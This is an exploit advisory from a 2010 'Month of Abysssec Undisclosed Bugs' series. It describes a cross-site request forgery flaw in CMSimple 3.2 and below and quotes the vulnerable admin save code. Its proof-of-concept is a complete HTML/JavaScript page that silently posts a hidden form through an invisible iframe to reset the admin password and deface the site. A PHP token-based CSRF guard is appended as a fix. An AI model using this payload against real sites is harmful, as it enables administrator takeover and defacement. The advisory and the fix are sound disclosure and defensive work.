Month Of Abysssec Undisclosed Bugs - CMSimple 3.2

Posted Sep 18, 2010
Authored by Abysssec | Site abysssec.com

Month Of Abysssec Undisclosed Bugs - CMSimple versions 3.2 and below suffer from a cross-site request forgery vulnerability.

tags | exploit, csrf
SHA-256 | 222618d51aabdb031a7b98ec991aa0c5bd04539cebaa77f999e66cb8f96a26a7

'''
__ __ ____ _ _ ____
| \/ |/ __ \ /\ | | | | _ \
| \ / | | | | / \ | | | | |_) |
| |\/| | | | |/ /\ \| | | | _ <
| | | | |__| / ____ \ |__| | |_) |
|_| |_|\____/_/ \_\____/|____/

http://www.exploit-db.com/moaub-18-cmsimple-xsrf-vulnerability/

'''


- Title : CMSimple XSRF Vulnerability
- Affected Version : CMSimple <= 3.2
- Vendor Site : www.cmsimple.org

- Discovery : Abysssec


- Description :
===============
CMSimple is one of the smallest, smartest and most simple Content Management Systems, released under the GPL or AGPL licence.
The CMS supports multiple languages.

- Vulnerability:
==================
XSRFs
--------
Several XSRF flaws exist in this CMS; an attacker can use them to change the admin password, change the user type, or deface the website.

Here is the vulnerable code:

file: cmsimple/adm.php [lines 141-180]:
// The 'save' branch is reached from any request carrying action=save;
// nothing ties the request to a form the admin actually submitted.
if ($action == 'save') {
    if ($form == 'array') {
        $text = "<?php\n";
        foreach($GLOBALS[$a] as $k1 => $v1) {
            if (is_array($v1)) {
                foreach($v1 as $k2 => $v2) {
                    if (!is_array($v2)) {
                        // Every config key is overwritten from the matching request variable.
                        initvar($k1.'_'.$k2);
                        $GLOBALS[$a][$k1][$k2] = $GLOBALS[$k1.'_'.$k2];
                        $GLOBALS[$a][$k1][$k2] = stsl($GLOBALS[$a][$k1][$k2]);
                        if ($k1.$k2 == 'editorbuttons')$text .= '$'.$a.'[\''.$k1.'\'][\''.$k2.'\']=\''.$GLOBALS[$a][$k1][$k2].'\';';
                        else $text .= '$'.$a.'[\''.$k1.'\'][\''.$k2.'\']="'.preg_replace("/\"/s", "", $GLOBALS[$a][$k1][$k2]).'";'."\n";
                    }
                }
            }
        }
        $text .= '?>';
    }
    else $text = rmnl(stsl($text));
    // The rebuilt file (config.php or a language file) is written to disk unconditionally.
    if ($fh = @fopen($pth['file'][$file], "w")) {
        fwrite($fh, $text);
        fclose($fh);
        if ($file == 'config' || $file == 'language') {
            if (!@include($pth['file'][$file]))e('cntopen', $file, $pth['file'][$file]);
            if ($file == 'config') {
                $pth['folder']['template'] = $pth['folder']['templates'].$cf['site']['template'].'/';
                $pth['file']['template'] = $pth['folder']['template'].'template.htm';
                $pth['file']['stylesheet'] = $pth['folder']['template'].'stylesheet.css';
                $pth['folder']['menubuttons'] = $pth['folder']['template'].'menu/';
                $pth['folder']['templateimages'] = $pth['folder']['template'].'images/';
                if (!(preg_match('/\/[A-z]{2}\/[^\/]*/', sv('PHP_SELF')))) {
                    $sl = $cf['language']['default'];
                    $pth['file']['language'] = $pth['folder']['language'].$sl.'.php';
                    if (!@include($pth['file']['language']))die('Language file '.$pth['file']['language'].' missing');
                }
            }
        }
    }
    else e('cntwriteto', $file, $pth['file'][$file]);
}

- PoC:
Serve this page to a logged-in CMS admin; the browser attaches the admin's session cookie to the auto-submitted POST, so the config save is accepted:
<html>
<head>
<title>Change Password and Deface site.</title>
<script>
function creat_request (path,parameter,method) {
    method = method || "post";
    var remote_dive = document.createElement('div');
    remote_dive.id = 'Div_id';
    var style = 'border:0;width:0;height:0;';
    remote_dive.innerHTML = "<iframe name='iframename' id='iframeid' style='"+style+"'></iframe>";
    document.body.appendChild(remote_dive);
    var form = document.createElement("form");
    form.setAttribute("method", method);
    form.setAttribute("action", path);
    form.setAttribute("target", "iframename");

    for(var key in parameter) {
        var hiddenField = document.createElement("input");
        hiddenField.setAttribute("type", "hidden");
        hiddenField.setAttribute("name", key);
        hiddenField.setAttribute("value", parameter[key]);
        form.appendChild(hiddenField);
    }
    document.body.appendChild(form);
    form.submit();
}
function bypass(){
    creat_request('http://site.com/cmsimple/',{'security_password':'test1','security_type':'page','site_title':'ALERT.','site_template':'default','language_default':'en','meta_keywords':'CMSimple%2C+Content+Management+System%2C+php','meta_description':'CMSimple+is+a+simple+content+management+system+for+smart+maintainance+of+small+commercial+or+private+sites.+It+is+simple+-+small+-+smart%21','backup_numberoffiles':'5','images_maxsize':'150000','downloads_maxsize':'1000000','mailform_email':'','editor_height':'%28screen.availHeight%29-400','editor_external':'','menu_color':'000000','menu_highlightcolor':'808080','menu_levels':'3','menu_levelcatch':'10','menu_sdoc':'','menu_legal':'CMSimple+Legal+Notices','uri_seperator':'%3A','uri_length':'200','xhtml_endtags':'','xhtml_amp':'true','plugins_folder':'','functions_file':'functions.php','scripting_regexp':'%5C%23CMSimple+%28.*%3F%29%5C%23','form':'array','file':'config','action':'save'});
}
</script>
</head>
<body onload="bypass();" >
</body>
</html>
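The save branch in adm.php accepts any POST carrying action=save, which is exactly what the page above exploits: the admin's session cookie is enough to authorise a write to config.php. As an added example, not CMSimple's own code, the following PHP shows the synchronizer-token guard a maintainer could place in front of such a handler. The helper names csrf_token(), csrf_check() and csrf_field() are assumptions for this illustration and are not CMSimple APIs.

```php
<?php
// Added example (not CMSimple's code): a synchronizer-token guard for a
// state-changing admin action such as the 'save' branch in adm.php.
// Function names here are assumptions, not part of CMSimple.

// Defence in depth: a SameSite session cookie is not sent on cross-site
// form posts by most browsers (array form of this call needs PHP 7.3+).
session_set_cookie_params(['samesite' => 'Lax', 'httponly' => true]);
session_start();

// Issue (or reuse) one unguessable token per session.
function csrf_token(): string {
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Hidden field to embed in every admin form that posts back to the handler.
function csrf_field(): string {
    return '<input type="hidden" name="csrf_token" value="'
         . htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8') . '">';
}

// True only for a POST whose token matches the session copy (compared in
// constant time) and whose Origin/Referer, when present, names this host.
function csrf_check(array $post, array $server): bool {
    if (($server['REQUEST_METHOD'] ?? '') !== 'POST') {
        return false;               // never change state on GET
    }
    $sent     = (string)($post['csrf_token'] ?? '');
    $expected = (string)($_SESSION['csrf_token'] ?? '');
    if ($sent === '' || $expected === '' || !hash_equals($expected, $sent)) {
        return false;
    }
    // An auto-submitted form on an attacker's page carries that page's Origin.
    $host = strtolower(explode(':', (string)($server['HTTP_HOST'] ?? ''))[0]);
    foreach (['HTTP_ORIGIN', 'HTTP_REFERER'] as $header) {
        if (!empty($server[$header])) {
            $srcHost = strtolower((string)parse_url($server[$header], PHP_URL_HOST));
            if ($srcHost !== $host) {
                return false;
            }
        }
    }
    return true;
}

// How the guard sits in front of the vulnerable branch: the original save
// logic may only run once the request has proven it came from our own form.
if (($_POST['action'] ?? '') === 'save') {
    if (!csrf_check($_POST, $_SERVER)) {
        http_response_code(403);
        exit('Request rejected: missing or invalid CSRF token.');
    }
    // ... original $form == 'array' / fopen / fwrite logic goes here ...
}
```

The token comparison is the primary control; the Origin/Referer check and the SameSite cookie attribute are layered on because each alone has gaps (older browsers, stripped Referer headers). With this in place, the PoC's hidden form still reaches the server, but it cannot supply a csrf_token value it has never seen, so the write never happens.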
